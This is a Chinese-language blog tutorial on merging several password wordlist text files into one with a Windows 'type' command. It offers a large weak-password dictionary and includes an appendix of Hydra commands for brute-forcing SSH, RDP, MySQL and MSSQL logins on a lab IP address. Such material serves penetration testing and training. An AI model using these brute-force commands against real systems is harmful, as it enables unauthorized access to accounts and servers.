前言
最近很多人都在问,自己有很多资料,比方说之前讲到的弱口令字典库可以结合Hydria或者burpsuite进行爆破
burpsuite我们之前提供过详细的介绍,Hydria在文末有。
![图片[1]-如何将多个txt文本合并在一起,一行命令搞定!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2021/09/20210908012223956-1024x896.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
但是文件都是一个一个的txt文本,而很多工具在跑字典的时候只能调用一个txt文本,那我们如何将他们合并在一起呢?
演示
无论是多少个文本,我们都只需要一行命令搞定!
具体步骤
我们这里随便找了3个txt文本
![图片[2]-如何将多个txt文本合并在一起,一行命令搞定!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2021/09/20210908012533181.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
type *.txt >res
然后使用上述命令,可以生成res
文件,然后将其修改为.txt
就行了
![图片[3]-如何将多个txt文本合并在一起,一行命令搞定!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2021/09/20210908012603627.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
动图演示
动图需要你点开之后,点击播放才能看哦
![图片[4]-如何将多个txt文本合并在一起,一行命令搞定!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2021/09/20210908012720167.gif?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
福利
评论获取合成好的弱口令字典库
,大约1.35GB,当然还有github上下载下来的完整版(完整版还包括了目录扫描可以用到的以及其他字典库)。
附录:Hydra爆破密码
我们之前讲过kali虚拟机的安装,安装好后里面是自带hydra的
如果没有kali也没事,windows我们这里也提供了一个软件,点击下载
我们打开powershell
![图片[5]-如何将多个txt文本合并在一起,一行命令搞定!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2021/09/20210908021004912.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
windows的使用方法和下面介绍的命令类似,只不过需要使用.\hydra
来替换下面的hydra
命令
![图片[6]-如何将多个txt文本合并在一起,一行命令搞定!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2021/09/20210908020726732.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Hydra爆破ssh
命令
这里讲一下一句话爆破ssh的命令
hydra 192.168.8.88 ssh -l root -P res.txt -t 6 -V -f
命令参数讲解
攻击目标:192.168.8.88
使用的模块:ssh
爆破用户名:root (-l
)
使用的密码字典:res.txt (-P
)
爆破线程数:6 (-t
)
显示详细信息 (-V
)
爆破成功一个后停止 (-f
)
Hydra爆破rdp远程桌面
这里爆破的是IP地址为192.168.8.88
,用户名为Administrator
的密码,使用的是res.txt
字典库
hydra -l Administrator -P res.txt rdp://192.168.8.88
Hydra爆破mysql
这里爆破的是IP地址为192.168.8.88
,用户名为root
的mysql数据库密码,使用的是res.txt
字典库
hydra -l root -P res.txt 192.168.8.88 mysql
hydra爆破sql server
这里爆破的是IP地址为192.168.8.88
,用户名为sa
的mssql数据库密码(因为mssql数据库默认用户名是sa),使用的是res.txt
字典库
hydra -l sa -P res.txt 192.168.8.88 mssql
- 最新
- 最热
只看作者